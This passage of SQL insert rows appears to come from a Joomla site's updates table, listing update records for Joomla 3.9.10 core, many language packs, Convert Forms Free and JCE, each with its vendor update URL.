(750, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(751, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(752, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(753, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(754, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(755, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(756, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(757, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(758, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(759, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(760, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(761, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(762, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(763, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(764, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(765, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(766, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(767, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(768, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(769, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(770, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(771, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(772, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(773, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(774, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(775, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(776, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(777, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(778, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(779, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(780, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(781, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(782, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(783, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(784, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(785, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(786, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(787, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(788, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(789, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(790, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(791, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(792, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(793, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(794, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(795, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(796, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(797, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(798, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(799, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(800, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(801, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(802, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(803, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(804, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(805, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(806, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(807, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(808, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(809, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(810, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(811, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(812, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(813, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(814, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(815, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(816, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(817, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(818, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(819, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(820, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(821, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(822, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(823, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(824, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(825, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(826, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(827, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(828, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(829, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(830, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(831, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(832, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(833, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(834, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(835, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(836, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(837, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(838, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(839, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(840, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(841, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(842, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(843, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(844, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(845, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(846, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(847, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(848, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(849, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(850, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(851, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(852, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(853, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(854, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(855, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(856, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(857, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(858, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(859, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(860, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(861, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(862, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(863, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(864, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.2', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(865, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(866, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(867, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(868, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(869, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(870, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(871, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(872, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(873, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(874, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(875, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(876, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(877, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(878, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(879, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(880, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(881, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(882, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(883, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(884, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(885, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(886, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(887, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(888, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(889, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(890, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(891, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(892, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(893, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(894, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(895, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(896, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(897, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(898, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(899, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(900, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(901, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(902, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(903, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(904, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(905, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(906, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(907, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(908, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(909, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.2', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(910, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(911, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(912, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(913, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(914, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(915, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(916, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(917, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(918, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(919, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(920, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(921, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(922, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(923, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(924, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(925, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(926, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(927, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
